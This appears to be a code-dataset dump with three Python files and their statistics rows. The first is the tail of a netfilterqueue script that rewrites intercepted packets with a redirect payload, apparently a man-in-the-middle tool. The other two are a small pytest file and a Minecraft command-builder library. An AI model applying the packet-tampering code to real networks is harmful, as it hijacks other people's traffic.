                modified_packet = set_load(scapy_packet, REDIRECT_PAYLOAD)
                # netfilterqueue expects raw bytes (str() was a Python-2-ism)
                packet.set_payload(bytes(modified_packet))
    packet.accept()
# Bind to NFQUEUE number 0 (packets must be directed there via iptables)
# and process packets until interrupted.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.086957 | 193 | 0.654162 | 246 | 1,706 | 4.439024 | 0.414634 | 0.120879 | 0.117216 | 0.086996 | 0.162088 | 0.100733 | 0.054945 | 0 | 0 | 0 | 0 | 0.032159 | 0.234467 | 1,706 | 45 | 194 | 37.911111 | 0.803982 | 0 | 0 | 0 | 0 | 0 | 0.058716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.076923 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469393ea6c4b1c5c7b78ca579da1a18fef848cb3 | 625 | py | Python | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | null | null | null | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T17:29:40.000Z | 2020-03-24T17:29:40.000Z | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T16:41:31.000Z | 2020-03-24T16:41:31.000Z | from ndebug import env_helpers
def test_inspect_ops(mocker):
    # DEBUG_* environment variables are parsed into typed option values:
    # 'no' -> False, numeric text -> int, 'enabled' -> True, 'null' -> None;
    # the DEBUG_ prefix is stripped and the key lower-cased.
    mocker.patch.dict('os.environ', {'DEBUG_COLORS': 'no',
                                     'DEBUG_DEPTH': '10',
                                     'DEBUG_SHOW_HIDDEN': 'enabled',
                                     'DEBUG_SOMETHING': 'null'})
    actual = env_helpers.options()
    assert actual == {'colors': False, 'depth': 10, 'show_hidden': True, 'something': None}
def test_load_and_save():
    # load() yields the empty string before anything was saved, and echoes
    # back whatever save() stored afterwards.
    actual = env_helpers.load()
    assert actual == ''
    env_helpers.save('test:data')
    actual = env_helpers.load()
    assert actual == 'test:data'
| 31.25 | 91 | 0.5536 | 67 | 625 | 4.925373 | 0.507463 | 0.151515 | 0.193939 | 0.121212 | 0.193939 | 0.193939 | 0 | 0 | 0 | 0 | 0 | 0.009281 | 0.3104 | 625 | 19 | 92 | 32.894737 | 0.756381 | 0 | 0 | 0.142857 | 0 | 0 | 0.2064 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.142857 | false | 0 | 0.071429 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4694573c6edf0ff0ed4f4786ad3fb6ae431575db | 29,122 | py | Python | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | 1 | 2020-06-13T13:57:11.000Z | 2020-06-13T13:57:11.000Z | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | null | null | null | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | null | null | null | import abc
class CommandBlock:
    # One physical command block: the command plus block-level settings
    # (conditional flag, block mode, always-active, etc.).
    def __init__(self, command, conditional=True, mode='CHAIN', auto=True,
                 opposite=False, single_use=True):
        self.command = command
        self.cond = conditional
        self.mode = mode
        self.auto = auto
        self.opposite = opposite
        self.single_use = single_use

    def resolve(self, scope):
        # Delegate to the held command; scope supplies all name mappings.
        return self.command.resolve(scope)


class Resolvable(metaclass=abc.ABCMeta):
    # Anything that can be rendered to final command text given a scope.
    @abc.abstractmethod
    def resolve(self, scope):
        pass


class SimpleResolve(Resolvable):
    # Joins its arguments with spaces, resolving the Resolvable ones and
    # passing plain strings through untouched.
    def __init__(self, *args):
        self.args = args

    def resolve(self, scope):
        return ' '.join(map(lambda el: el.resolve(scope) \
                            if isinstance(el, Resolvable) \
                            else el, self.args))


class Command(Resolvable):
    # Base class for all concrete commands.
    pass


class EntityRef(Resolvable):
    # Base for anything usable as a command target.
    def is_single_entity(self, scope):
        # Subclasses report whether this reference selects exactly one entity.
        raise NotImplementedError()

    @property
    def ref(self):
        # Wrap as a BlockOrEntityRef for commands taking 'entity <target>'.
        return EntityReference(self)


class ObjectiveRef(Resolvable):
    # A scoreboard objective name, remapped through the scope on resolve.
    def __init__(self, name):
        assert type(name) == str
        self.objective = name

    def resolve(self, scope):
        return scope.objective(self.objective)
class NameRef(EntityRef):
    """A reference to an entity by literal name (e.g. a fake player)."""

    def __init__(self, name):
        assert type(name) == str
        self.name = name

    def is_single_entity(self, scope):
        # A literal name always targets exactly one scoreboard entry.
        # Fix: this was decorated @property while still taking `scope`,
        # so merely accessing it raised TypeError; every caller in this
        # file invokes it as a method, is_single_entity(scope).
        return True

    def resolve(self, scope):
        return self.name
class ScoreRef:
    # A (target entity, objective) pair naming one scoreboard slot.
    def __init__(self, target, objective):
        assert isinstance(target, EntityRef)
        assert isinstance(objective, ObjectiveRef)
        self.target = target
        self.objective = objective

    def resolve_pair(self, scope):
        # Render as 'target objective', the form scoreboard commands expect.
        return '%s %s' % (self.target.resolve(scope),
                          self.objective.resolve(scope))


class Var(ScoreRef):
    # A named variable: an objective score held on the global entity.
    def __init__(self, nameref):
        super().__init__(GlobalEntity, ObjectiveRef(nameref))
def make_selector(selector, **kwargs):
    """Build a target selector string such as '@a' or '@e[limit=1]'.

    Keyword arguments become selector parameters; dict values render
    recursively as '{k=v,...}' (used for e.g. scores).
    """
    base = '@' + selector
    if not kwargs:
        return base

    def render(items):
        # Render nested dicts as braced groups; other values verbatim.
        parts = []
        for key, val in items:
            rendered = '{%s}' % render(val.items()) if type(val) == dict else val
            parts.append('%s=%s' % (key, rendered))
        return ','.join(parts)

    return '%s[%s]' % (base, render(kwargs.items()))
class Selector(EntityRef):
    # An @-style target selector (@a/@e/@s/@p/@r) plus optional arguments.
    def __init__(self, type, args=None):
        assert type in 'aespr'
        self.type = type
        assert args is None or isinstance(args, SelectorArgs)
        self.args = args

    def resolve_params(self, scope):
        if not self.args:
            return {}
        return self.args.resolve(scope)

    def is_single_entity(self, scope):
        # @s/@p/@r match at most one entity; otherwise require limit=1.
        if self.type in 'spr':
            return True
        params = self.resolve_params(scope)
        return 'limit' in params and params['limit'] == '1'

    def resolve(self, scope):
        return make_selector(self.type, **self.resolve_params(scope))


class _GlobalEntity(EntityRef):
    # The scope-provided entity that holds global scores/NBT.
    def is_single_entity(self, scope):
        return True

    def resolve(self, scope):
        return scope.global_entity()

GlobalEntity = _GlobalEntity()


class _PosUtil(EntityRef):
    # The scope-provided utility entity used for positional tricks.
    def is_single_entity(self, scope):
        return True

    def resolve(self, scope):
        return scope.pos_util_entity()

PosUtil = _PosUtil()


class NbtPath(Resolvable):
    # A raw NBT path; equality is by exact path text and exact type.
    def __init__(self, path):
        self.path = path

    def subpath(self, childpath):
        # TODO path validation
        return self.__class__(self.path + childpath)

    def resolve(self, scope):
        return self.path

    def __eq__(self, other):
        if type(other) != type(self):
            return False
        return self.path == other.path

    def __repr__(self):
        return '%s(%s)' % (self.__class__.__name__, self.path)


class Path(NbtPath):
    # An NBT path remapped through the scope's custom-path table.
    def resolve(self, scope):
        return scope.custom_nbt_path(self.path)


class ArrayPath(Path):
    # Path into a named array, e.g. 'stack[0].key'; subclasses set `name`.
    # A key is only valid together with an index.
    def __init__(self, index=None, key=None):
        sub = '[%d]' % index if index is not None else ''
        assert key is None or index is not None
        sub += '.%s' % key if key else ''
        super().__init__('%s%s' % (self.name, sub))

    def subpath(self, childpath):
        # Don't use our constructor
        return Path(self.path).subpath(childpath)


class StackPath(ArrayPath):
    name = 'stack'


def StackFrame(index):
    # Factory for a path class addressing the stack of frame `index`,
    # counted from the top of the stack.
    class StackFramePath(ArrayPath):
        name = 'stack[%d].stack' % (-index - 1)
    return StackFramePath

StackFrameHead = StackFrame(0)


class GlobalPath(ArrayPath):
    name = 'globals'


class Cmd(Command):
    # A literal, pre-rendered command string.
    def __init__(self, cmd):
        self.command = cmd

    def resolve(self, scope):
        return self.command


class Execute(Command):
    # An /execute command assembled from an ExecuteChain's components.
    def __init__(self, chain):
        self.chain = SimpleResolve(*chain._components)

    def resolve(self, scope):
        return 'execute %s' % self.chain.resolve(scope)


def ensure_selector(sel_arg):
    # Guard: all selector-position arguments must be EntityRefs.
    assert isinstance(sel_arg, EntityRef), sel_arg
    return sel_arg
class ExecuteChain:
    # Fluent builder for /execute subcommand chains. `can_terminate`
    # tracks whether the chain may end without 'run' — only true right
    # after an if/unless condition has been completed.
    def __init__(self):
        self._components = []
        self.can_terminate = False

    def add(self, *args):
        # Accumulate components; plain values are stringified, Resolvables
        # are kept for later resolution.
        for arg in args:
            if type(arg) in [str, int, float]:
                self._components.append(str(arg))
            elif isinstance(arg, Resolvable):
                self._components.append(arg)
            else:
                assert False, type(arg)
        return self

    def run(self, cmd):
        # Terminate the chain with 'run <cmd>'.
        self.add('run', cmd)
        return Execute(self)

    def finish(self):
        # Terminate without 'run'; only valid after a condition.
        assert self.can_terminate
        return Execute(self)

    def as_entity(self, select_arg):
        self.can_terminate = False
        return self.add('as', ensure_selector(select_arg))

    def at(self, select_arg):
        self.can_terminate = False
        return self.add('at', ensure_selector(select_arg))

    def at_pos(self, pos):
        self.can_terminate = False
        return self.add('positioned', pos)

    def at_entity_pos(self, select_arg):
        self.can_terminate = False
        return self.add('positioned', 'as', ensure_selector(select_arg))

    def align(self, axes):
        self.can_terminate = False
        # axes must be a subset of 'xyz' in order, e.g. 'xz'
        assert ''.join(axis for axis in axes if axis in 'xyz') == axes
        return self.add('align', axes)

    def facing(self, pos):
        self.can_terminate = False
        return self.add('facing', pos)

    def facing_entity(self, select_arg, feature):
        self.can_terminate = False
        assert feature == 'eyes' or feature == 'feet'
        return self.add('facing', 'entity', ensure_selector(select_arg), \
                        feature)

    def rotated(self, y, x):
        self.can_terminate = False
        return self.add('rotated', y, x)

    def rotated_as_entity(self, select_arg):
        self.can_terminate = False
        return self.add('rotated', 'as', ensure_selector(select_arg))

    def anchored(self, anchor):
        self.can_terminate = False
        assert anchor == 'feet' or anchor == 'eyes'
        return self.add('anchored', anchor)

    def cond(self, cond_type):
        self.can_terminate = False
        assert cond_type == 'if' or cond_type == 'unless'
        return ExecuteChain.Cond(self, cond_type)

    class Cond:
        # Builder for one 'if'/'unless' subcommand. Completing a condition
        # marks the parent chain as terminable.
        def add(self, *args):
            self.parent.can_terminate = True
            return self.parent.add(*((self.cond_type,) + args))

        def __init__(self, parent, cond_type):
            self.parent = parent
            self.cond_type = cond_type

        def entity(self, entityref):
            return self.add('entity', ensure_selector(entityref))

        def score(self, targetref, operator, sourceref):
            # 'if score <target> <op> <source>' comparison.
            assert isinstance(targetref, ScoreRef)
            assert isinstance(sourceref, ScoreRef)
            assert operator in ['<', '<=', '=', '>=', '>']
            return self.add('score', targetref.target, targetref.objective,
                            operator, sourceref.target, sourceref.objective)

        def score_range(self, scoreref, range):
            # 'if score <target> matches <range>'.
            assert isinstance(scoreref, ScoreRef)
            assert isinstance(range, ScoreRange)
            return self.add('score', scoreref.target, scoreref.objective,
                            'matches', range)

        def block(self, pos, block):
            assert isinstance(pos, WorldPos) and pos.block_pos
            return self.add('block', pos, block)

        def blocks_match(self, begin, end, dest, type):
            assert type in ['all', 'masked']
            return self.add('blocks', begin, end, dest, type)

    def store(self, store_type):
        # Begin a 'store result|success ...' subcommand.
        assert store_type in ['result', 'success']
        self.can_terminate = False
        return ExecuteChain.Store(self, store_type)

    class Store:
        # Builder for the destination of a 'store' subcommand.
        def add(self, *args):
            return self.parent.add(*(('store', self.store_type) + args))

        def __init__(self, parent, store_type):
            self.parent = parent
            self.store_type = store_type

        def score(self, scoreref):
            assert isinstance(scoreref, ScoreRef)
            return self.add('score', scoreref.target, scoreref.objective)

        def entity(self, target, path, data_type, scale=1):
            return self.add('entity', ensure_selector(target), \
                            path, data_type, scale)

        def bossbar(self, bar, attr):
            assert attr in ['value', 'max']
            return self.add('bossbar', bar, attr)
class BlockOrEntityRef(Resolvable):
    # Either a block position or an entity, as accepted by /data etc.
    pass


class EntityReference(BlockOrEntityRef):
    # 'entity <target>' reference; the target must select a single entity.
    def __init__(self, target):
        assert isinstance(target, EntityRef)
        self.target = target

    def resolve(self, scope):
        assert self.target.is_single_entity(scope)
        return 'entity %s' % self.target.resolve(scope)


class WorldPos(Resolvable):
    # An (x, y, z) position. Coordinates may be absolute ints/floats,
    # world-relative (~) or anchor-relative (^). Anchor coordinates must
    # be used for all three axes or none; block positions disallow floats.
    def __init__(self, x, y, z, block_pos=False):
        is_anchor = self._check_coord(x, True, not block_pos)
        was_anchor = self._check_coord(y, is_anchor, not block_pos)
        is_anchor = self._check_coord(z, was_anchor, not block_pos)
        if was_anchor:
            assert is_anchor
        self.x, self.y, self.z = x, y, z
        self.block_pos = block_pos

    def _check_coord(self, val, allow_anchor, allow_float):
        # Validate one coordinate; returns True iff it is anchor-relative.
        if isinstance(val, AnchorRelCoord):
            assert allow_anchor
            return True
        if type(val) == float:
            assert allow_float
            return False
        if type(val) == int:
            return False
        if isinstance(val, WorldRelCoord):
            return False
        assert False, val

    @property
    def ref(self):
        # Wrap as a BlockOrEntityRef for commands taking 'block <pos>'.
        return BlockReference(self)

    def resolve(self, scope):
        return '%s %s %s' % (self.x, self.y, self.z)
class RelativeCoord:
    """A relative coordinate rendered as marker + offset.

    Subclasses provide `marker` ('~' world-relative, '^' anchor-relative).
    A zero offset renders as the bare marker; float offsets drop trailing
    zeros (and a trailing dot).
    """

    def __init__(self, val):
        # Only plain ints and floats are accepted (not bools/Decimals).
        assert type(val) in (int, float), val
        suffix = ''
        if type(val) == int:
            if val != 0:
                suffix = '%d' % val
        elif val != 0.0:
            # https://stackoverflow.com/a/2440786
            suffix = ('%f' % val).rstrip('0').rstrip('.')
        self.str = self.marker + suffix
        self.val = val

    def __str__(self):
        return self.str
class WorldRelCoord(RelativeCoord):
    # '~' coordinate, relative to the execution position.
    marker = '~'


class AnchorRelCoord(RelativeCoord):
    # '^' coordinate, relative to the execution anchor/facing.
    marker = '^'


class BlockReference(BlockOrEntityRef):
    # 'block <pos>' reference for /data and friends.
    def __init__(self, pos):
        assert isinstance(pos, WorldPos) and pos.block_pos
        self.pos = pos

    def resolve(self, scope):
        return 'block %s' % self.pos.resolve(scope)


class _UtilBlockPos(WorldPos):
    # Position of the scope-provided utility (or zero-tick) block.
    def __init__(self, is_zero_tick):
        self.block_pos = True
        self.is_zero_tick = is_zero_tick

    def resolve(self, scope):
        if self.is_zero_tick:
            return scope.get_zero_tick_block()
        return scope.get_util_block()

UtilBlockPos = _UtilBlockPos(False)
ZeroTickBlockPos = _UtilBlockPos(True)


class DataGet(Command):
    # 'data get <target> <path> <scale>'.
    def __init__(self, target, path, scale=1):
        assert isinstance(target, BlockOrEntityRef)
        assert isinstance(scale, (int, float))
        self.target = target
        self.path = path
        # Render integral scales without a decimal point.
        self.scale = int(scale) if scale == int(scale) else scale

    def resolve(self, scope):
        return 'data get %s %s %s' % (self.target.resolve(scope),
                                      self.path.resolve(scope), self.scale)


class DataMerge(Command):
    # 'data merge <target> <nbt>'.
    def __init__(self, ref, nbt):
        assert isinstance(ref, BlockOrEntityRef)
        self.ref = ref
        self.nbt = nbt

    def resolve(self, scope):
        return 'data merge %s %s' % (self.ref.resolve(scope),
                                     self.nbt.resolve(scope))


class DataModify(Command):
    # Base for 'data modify <target> <path> <action> ...'; subclasses
    # consume *rest via init() and extend resolve().
    def __init__(self, ref, path, action, *rest):
        assert isinstance(ref, BlockOrEntityRef)
        self.ref = ref
        self.path = path
        self.action = action
        self.init(*rest)

    def resolve(self, scope):
        return 'data modify %s %s %s' % (
            self.ref.resolve(scope), self.path.resolve(scope), self.action)


class DataModifyValue(DataModify):
    # '... value <literal>'.
    def init(self, val):
        self.val = val

    def resolve(self, scope):
        return '%s value %s' % (super().resolve(scope), self.val.resolve(scope))


class DataModifyFrom(DataModify):
    # '... from <source-ref> <source-path>'.
    def init(self, ref, path):
        assert isinstance(ref, BlockOrEntityRef)
        self.fromref = ref
        self.frompath = path

    def resolve(self, scope):
        return '%s from %s %s' % (super().resolve(scope),
                                  self.fromref.resolve(scope), self.frompath.resolve(scope))


class DataModifyStack(DataModifyValue):
    # Convenience: modify a stack slot held on the global entity.
    def __init__(self, index, key, action, value, path=StackPath):
        super().__init__(GlobalEntity.ref, path(index, key), action,
                         value)


class DataRemove(Command):
    # 'data remove <target> <path>'.
    def __init__(self, ref, path):
        assert isinstance(ref, BlockOrEntityRef)
        self.ref = ref
        self.path = path

    def resolve(self, scope):
        return 'data remove %s %s' % (self.ref.resolve(scope),
                                      self.path.resolve(scope))


class Function(Command):
    # 'function <name>', resolved through the scope's function table.
    def __init__(self, func_name):
        self.name = func_name

    def resolve(self, scope):
        return 'function %s' % scope.function_name(self.name)


class Tellraw(Command):
    # 'tellraw <target> <json text>'.
    def __init__(self, text, target):
        assert isinstance(text, TextComponentHolder)
        assert isinstance(target, EntityRef)
        self.text = text
        self.target = target

    def resolve(self, scope):
        return 'tellraw %s %s' % (self.target.resolve(scope),
                                  self.text.resolve_str(scope))
class TextComponent(Resolvable):
    # Base for pieces of JSON chat text.
    pass


class TextComponentHolder(TextComponent):
    # A styled node holding child components; resolves to the JSON dict
    # (or bare list, when style-less) used by tellraw and friends.
    def __init__(self, style, children):
        self.style = style
        self.children = children

    def resolve_str(self, scope):
        # Compact JSON encoding for embedding into a command string.
        import json
        return json.dumps(self.resolve(scope), separators=(',', ':'))

    def resolve(self, scope):
        text = {}
        for key, value in self.style.items():
            text[key] = self._resolve_style(key, value, scope)
        extra = []
        for child in self.children:
            if isinstance(child, TextComponentHolder) and not child.style:
                # Flatten style-less holders into this node's children.
                for child_child in child.children:
                    extra.append(child_child.resolve(scope))
            else:
                extra.append(child.resolve(scope))
        if not self.style:
            return extra
        if extra:
            if len(extra) == 1 and type(extra[0]) == dict:
                # A single dict child merges directly instead of via 'extra'.
                text.update(extra[0])
            else:
                text['extra'] = extra
        return text

    def _resolve_style(self, key, value, scope):
        # clickEvent values need resolving; other style values pass through.
        if key == 'clickEvent':
            assert isinstance(value, TextClickAction)
            return value.resolve(scope)
        return value


class TextStringComponent(TextComponent):
    # A plain-text component.
    def __init__(self, stringval):
        self.val = stringval

    def resolve(self, scope):
        return {'text': self.val}


class TextNBTComponent(TextComponent):
    # Displays NBT data read from a single entity.
    def __init__(self, entity, path):
        assert isinstance(entity, EntityRef)
        assert isinstance(path, Path)
        self.entity = entity
        self.path = path

    def resolve(self, scope):
        assert self.entity.is_single_entity(scope)
        return {'nbt': self.path.resolve(scope),
                'entity': self.entity.resolve(scope)}


class TextScoreComponent(TextComponent):
    # Displays a scoreboard value.
    def __init__(self, ref):
        assert isinstance(ref, ScoreRef)
        self.ref = ref

    def resolve(self, scope):
        return {'score':
                {'name': self.ref.target.resolve(scope),
                 'objective': self.ref.objective.resolve(scope)}}


class TextClickAction(Resolvable):
    # A clickEvent payload; command-valued actions resolve their command.
    def __init__(self, action, value):
        self.action = action
        self.value = value

    def resolve(self, scope):
        if type(self.value) == str:
            value = self.value
        else:
            assert self.action in ['run_command', 'suggest_command'] \
                   and isinstance(self.value, Command)
            value = self.value.resolve(scope)
        return {'action': self.action, 'value': value}
class Teleport(Command):
    # 'tp <target> [destination args...]'.
    def __init__(self, target, *more):
        assert isinstance(target, EntityRef)
        self.args = [target]
        self.args.extend(more)

    def resolve(self, scope):
        return 'tp %s' % ' '.join(a.resolve(scope) for a in self.args)


class Clone(Command):
    # 'clone <src0> <src1> <dest>'.
    def __init__(self, src0, src1, dest):
        self.src0 = src0
        self.src1 = src1
        self.dest = dest

    def resolve(self, scope):
        return 'clone %s %s %s' % (self.src0.resolve(scope),
                                   self.src1.resolve(scope),
                                   self.dest.resolve(scope))


class Setblock(Command):
    # 'setblock <pos> <block>'.
    def __init__(self, pos, block):
        assert isinstance(pos, WorldPos) and pos.block_pos
        self.pos = pos
        self.block = block

    def resolve(self, scope):
        return 'setblock %s %s' % (self.pos.resolve(scope),
                                   self.block.resolve(scope))


class Scoreboard(Command):
    # Base for 'scoreboard players <op> <target> <objective> <value>';
    # subclasses set `op` and may allow negative constants.
    allows_negative = False

    def __init__(self, varref, value):
        assert isinstance(varref, ScoreRef)
        assert isinstance(value, int)
        assert self.allows_negative or value >= 0
        self.var = varref
        self.value = value

    def resolve(self, scope):
        return 'scoreboard players %s %s %d' % (
            self.op, self.var.resolve_pair(scope), self.value)


class SetConst(Scoreboard):
    op = 'set'
    allows_negative = True


class AddConst(Scoreboard):
    op = 'add'


class RemConst(Scoreboard):
    op = 'remove'


class GetValue(Command):
    # 'scoreboard players get <target> <objective>'.
    def __init__(self, scoreref):
        assert isinstance(scoreref, ScoreRef)
        self.ref = scoreref

    def resolve(self, scope):
        return 'scoreboard players get %s' % self.ref.resolve_pair(scope)


class Operation(Command):
    # Base for 'scoreboard players operation <left> <op> <right>'.
    def __init__(self, left, right):
        assert isinstance(left, ScoreRef)
        assert isinstance(right, ScoreRef)
        self.left = left
        self.right = right

    def resolve(self, scope):
        return 'scoreboard players operation %s %s %s' % (
            self.left.resolve_pair(scope), self.op,
            self.right.resolve_pair(scope))


# One subclass per scoreboard operation token.
class OpAssign(Operation): op = '='
class OpAdd(Operation): op = '+='
class OpSub(Operation): op = '-='
class OpMul(Operation): op = '*='
class OpDiv(Operation): op = '/='
class OpMod(Operation): op = '%='
class OpIfLt(Operation): op = '<'
class OpIfGt(Operation): op = '>'
class OpSwap(Operation): op = '><'


class SelectorArgs(Resolvable):
    # Base for selector argument sets; resolve() returns a dict.
    pass


class SimpleSelectorArgs(SelectorArgs):
    # A fixed mapping of selector arguments.
    def __init__(self, args):
        self.args = args

    def resolve(self, scope):
        return dict(self.args)
class ScoreRange(Resolvable):
    """An inclusive scoreboard range: '5', '5..', '..3' or '1..3'.

    At least one bound must be given; equal bounds render as the single
    value with no '..'.
    """

    def __init__(self, min=None, max=None):
        assert min is not None or max is not None
        self.min = min
        self.max = max

    def resolve(self, scope):
        text = '' if self.min is None else '%d' % self.min
        if self.max is None:
            # open upper bound
            text += '..'
        elif self.max != self.min:
            text += '..%d' % self.max
        return text
class SelRange(SelectorArgs):
    # 'scores={objective=range}' selector argument.
    def __init__(self, objective, min=None, max=None):
        assert isinstance(objective, ObjectiveRef)
        self.objective = objective
        self.range = ScoreRange(min, max)

    def resolve(self, scope):
        return {'scores': { self.objective.resolve(scope):
                            self.range.resolve(scope) }}


class SelEquals(SelRange):
    # Score exactly equal to `value`.
    def __init__(self, objective, value):
        super().__init__(objective, value, value)


class ComboSelectorArgs(SelectorArgs):
    # Union of two argument sets; the second wins on key clashes.
    @staticmethod
    def new(first, second):
        # Skip the combination when either side is absent.
        if first is None: return second
        if second is None: return first
        return ComboSelectorArgs(first, second)

    def __init__(self, first, second):
        self.first = first
        self.second = second

    def resolve(self, scope):
        sel = {}
        sel.update(self.first.resolve(scope))
        sel.update(self.second.resolve(scope))
        return sel


class SelNbt(SelectorArgs):
    # 'nbt=...' selector argument built from a path (list of keys/indices)
    # and a leaf value.
    def __init__(self, path, value):
        self.nbt_spec = {}
        if not path:
            self.nbt_spec = value
        else:
            self.build_selector(path, self.nbt_spec, value)

    def build_selector(self, path, parent, value):
        # Materialise nested dicts/lists along `path`, then set the leaf.
        # Numeric path components index into (and grow) lists.
        for i in range(len(path) - 1):
            node = path[i]
            if node.isdigit():
                pos = int(node)
                while len(parent) < pos + 1:
                    parent.append({})
                parent = parent[pos]
                continue
            if node not in parent:
                parent[node] = {}
            if len(path) > i + 1:
                # Look ahead: a digit next means this node must be a list.
                if path[i+1].isdigit():
                    if not parent[node]:
                        parent[node] = []
                    else:
                        assert type(parent[node]) == list
            parent = parent[node]
        if path[-1].isdigit():
            pos = int(path[-1])
            while len(parent) < pos + 1:
                parent.append({})
            path[-1] = pos
        parent[path[-1]] = value

    def stringify_nbt(self, node, scope):
        # Render the nested spec as SNBT text.
        # TODO quoted keys
        if type(node) == dict:
            return '{%s}' % ','.join('%s:%s' % (k, self.stringify_nbt(v, scope))
                                     for k,v in node.items())
        if type(node) == list:
            return '[%s]' % ','.join(map(lambda n:self.stringify_nbt(n, scope), node))
        if isinstance(node, Resolvable):
            return node.resolve(scope)
        assert False, type(node)

    def resolve(self, scope):
        return {'nbt': self.stringify_nbt(self.nbt_spec, scope)}
class TeamName(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.team_name(self.name)
class TeamModify(Command):
def __init__(self, team, attr, value):
assert isinstance(team, TeamName)
self.team = team
assert attr in ['color', 'friendlyFire', 'seeFriendlyInvisibles',
'nametagVisibility', 'deathMessageVisibility',
'collisionRule', 'displayName', 'prefix', 'suffix']
self.attr = attr
self.value = value
def resolve(self, scope):
return 'team modify %s %s %s' % (self.team.resolve(scope), self.attr,
self.value)
class JoinTeam(Command):
def __init__(self, team, members):
assert isinstance(team, TeamName)
assert members is None or isinstance(members, EntityRef)
self.team = team
self.members = members
def resolve(self, scope):
members = (' ' + self.members.resolve(scope)) if self.members else ''
return 'team join %s%s' % (self.team.resolve(scope), members)
class Bossbar(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.bossbar(self.name)
class BossbarSet(Command):
def __init__(self, bar, prop, value):
assert isinstance(bar, Bossbar)
self.bar = bar
self.prop = prop
self.value = value
def resolve(self, scope):
value = (' ' + self.value.resolve(scope)) if self.value else ''
return 'bossbar set %s %s%s' % (self.bar.resolve(scope), self.prop,
value)
class Kill(Command):
def __init__(self, target):
assert isinstance(target, EntityRef)
self.target = target
def resolve(self, scope):
return 'kill %s' % self.target.resolve(scope)
class ReplaceItem(Command):
def __init__(self, ref, slot, item, amount=None):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.slot = slot
self.item = item
self.amount = amount
def resolve(self, scope):
amount = (' %d' % self.amount) if self.amount is not None else ''
return 'replaceitem %s %s %s%s' % (self.ref.resolve(scope), self.slot,
self.item.resolve(scope), amount)
class GiveItem(Command):
def __init__(self, targets, item, count=1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.count = count
def resolve(self, scope):
return 'give %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.count)
class ClearItem(Command):
def __init__(self, targets, item, max_count=-1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.max_count = max_count
def resolve(self, scope):
return 'clear %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.max_count)
class EffectGive(Command):
    """`effect give` command with explicit defaults for optional args."""

    def __init__(self, target, effect, seconds=None, amp=None, hide=None):
        assert isinstance(target, EntityRef)
        self.target = target
        self.effect = effect
        # None means "use the default" for each optional argument.
        self.seconds = 30 if seconds is None else seconds
        self.amp = 0 if amp is None else amp
        self.hide = False if hide is None else hide

    def resolve(self, scope):
        hide_s = 'true' if self.hide else 'false'
        return 'effect give %s %s %d %d %s' % (
            self.target.resolve(scope), self.effect, self.seconds,
            self.amp, hide_s)
class Particle(Command):
    """`particle` command; `players` optionally limits the audience."""

    def __init__(self, name, pos, delta, speed, count, mode, players):
        self.name = name
        self.pos = pos
        self.delta = delta
        self.speed = speed
        self.count = count
        self.mode = mode
        # Optional entity ref; omitted from the command when falsy.
        self.players = players

    def resolve(self, scope):
        if self.players:
            players = ' ' + self.players.resolve(scope)
        else:
            players = ''
        return 'particle %s %s %s %f %d %s%s' % (
            self.name, self.pos.resolve(scope), self.delta.resolve(scope),
            self.speed, self.count, self.mode, players)
class Title(Command):
    """`title` command; extra args are resolved and appended."""

    def __init__(self, target, action, *args):
        assert isinstance(target, EntityRef)
        self.target = target
        self.action = action
        self.args = args

    def resolve(self, scope):
        if self.args:
            tail = ' ' + SimpleResolve(*self.args).resolve(scope)
        else:
            tail = ''
        return 'title %s %s%s' % (self.target.resolve(scope), self.action,
                                  tail)
class Summon(Command):
    """`summon` command; NBT data forces an explicit position argument."""

    def __init__(self, entity_name, pos, data=None):
        assert pos is None or isinstance(pos, WorldPos)
        self.name = entity_name
        self.pos = pos
        self.data = data

    def resolve(self, scope):
        if self.pos:
            pos = ' ' + self.pos.resolve(scope)
        elif self.data:
            # A data tag requires a position; default to the command's
            # own location.
            pos = ' ~ ~ ~'
        else:
            pos = ''
        if self.data:
            data = ' ' + self.data.resolve(scope)
        else:
            data = ''
        return 'summon %s%s%s' % (self.name, pos, data)
class Advancement(Command):
    """`advancement grant|revoke` command."""

    def __init__(self, action, target, range, *args):
        assert action in ['grant', 'revoke']
        assert isinstance(target, EntityRef)
        self.action = action
        self.target = target
        self.range = range
        self.args = args

    def resolve(self, scope):
        if self.args:
            extra = ' ' + SimpleResolve(*self.args).resolve(scope)
        else:
            extra = ''
        return 'advancement %s %s %s%s' % (
            self.action, self.target.resolve(scope), self.range, extra)
